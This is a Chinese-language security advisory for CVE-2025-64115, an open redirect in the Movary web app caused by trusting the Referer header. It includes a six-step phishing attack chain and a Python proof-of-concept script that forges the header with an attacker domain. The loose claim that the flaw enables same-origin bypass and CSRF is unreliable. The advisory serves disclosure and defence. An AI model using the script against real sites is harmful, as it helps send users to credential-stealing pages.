CVE-2025-64115 Movary开放重定向漏洞

漏洞信息

漏洞编号

CVE-2025-64115

漏洞类型

开放重定向

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Movary

漏洞概述

Movary是一款用于追踪、评分和探索电影观看历史的Web应用程序。该应用在多个设置端点中直接使用HTTP Referer头值进行重定向操作，未对Referer头进行充分的验证和过滤。攻击者可以构造恶意链接，通过操纵Referer头诱导用户重定向到攻击者控制的恶意网站，从而实施钓鱼攻击、凭证窃取或其他恶意活动。由于该漏洞利用需要用户交互（点击恶意链接），且不影响系统的机密性、完整性和可用性，因此被评定为中危漏洞。攻击者通常利用此漏洞进行社会工程攻击，窃取用户凭据或传播恶意软件。

技术细节

该漏洞存在于Movary应用的多个设置端点中。当用户访问设置相关页面并触发重定向操作时，应用程序直接读取HTTP请求中的Referer头字段，并将其作为重定向目标URL，而未进行任何输入验证或安全检查。攻击者可以创建一个包含恶意重定向URL的链接，诱骗用户访问。当用户点击该链接并访问目标站点后，应用程序会读取攻击者设置的Referer头，然后重定向用户到攻击者指定的任意URL。攻击者通常会选择伪造的登录页面或其他钓鱼站点，诱导用户输入敏感信息。此外，攻击者还可以利用此漏洞绕过同源策略限制，执行跨站请求伪造（CSRF）攻击。修复版本0.69.0通过不对Referer头进行直接信任和使用安全的重定向机制解决了此问题。

攻击链分析

STEP 1

步骤1

攻击者创建钓鱼网站：在攻击者控制的域名（如evil-site.com）上部署钓鱼页面，伪装成Movary的登录界面或其他可信页面

STEP 2

步骤2

构造恶意链接：攻击者构造包含Movary设置端点的URL，并通过社会工程手段（如钓鱼邮件、即时通讯）发送给目标用户

STEP 3

步骤3

用户点击链接：目标用户点击攻击者发送的恶意链接，浏览器向Movary服务器发送请求，Referer头被设置为攻击者控制的页面

STEP 4

步骤4

触发开放重定向：Movary应用在处理设置端点请求时，直接使用HTTP Referer头值进行重定向操作，未进行安全验证

STEP 5

步骤5

重定向到钓鱼站点：用户浏览器被重定向到攻击者控制的钓鱼网站，用户在不知情的情况下输入凭据或其他敏感信息

STEP 6

步骤6

窃取用户数据：攻击者获取用户的凭据、会话令牌或其他敏感信息，用于进一步的攻击或非法牟利

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2025-64115 Open Redirect in Movary
# Target: Movary <= 0.68.0

def exploit_open_redirect(target_url, malicious_domain):
    """
    Exploit the open redirect vulnerability by manipulating the Referer header
    
    Args:
        target_url: Base URL of the vulnerable Movary instance
        malicious_domain: Attacker's controlled domain for redirect
    
    Returns:
        bool: True if the redirect is successful
    """
    # Craft the malicious URL pointing to settings endpoint
    settings_endpoint = f"{target_url}/settings"
    
    # Set the Referer header to point to attacker-controlled site
    headers = {
        'Referer': f"https://{malicious_domain}/malicious-page",
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        # Send request to trigger redirect
        response = requests.get(settings_endpoint, headers=headers, allow_redirects=False)
        
        # Check if Location header contains the malicious domain
        if 'Location' in response.headers:
            location = response.headers['Location']
            print(f"[+] Redirect Location: {location}")
            
            if malicious_domain in location:
                print("[!] Open Redirect Vulnerability Confirmed!")
                return True
        
        return False
        
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

# Example usage
if __name__ == "__main__":
    target = "http://vulnerable-movary.com"
    attacker_domain = "evil-phishing-site.com"
    
    result = exploit_open_redirect(target, attacker_domain)
    print(f"Exploit Result: {result}")

# Attack scenario:
# 1. Attacker creates a phishing page on evil-phishing-site.com
# 2. Attacker sends malicious link to victim
# 3. Victim clicks link and visits vulnerable Movary site
# 4. Application reads attacker's Referer header
# 5. Victim gets redirected to phishing site
# 6. Victim enters credentials on fake login page

影响范围

Movary <= 0.68.0

防御指南

临时缓解措施

如果无法立即升级到修复版本，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)层面配置规则，检测和拦截异常的Referer头值；2) 禁用或限制Referer头的使用，在服务器配置中设置严格的Referrer-Policy；3) 在用户访问敏感功能时增加多因素认证，降低凭据被盗用的风险；4) 加强用户安全意识培训，提醒用户不要点击来源不明的链接；5) 实施会话超时和异常登录检测机制，及时发现账号异常活动。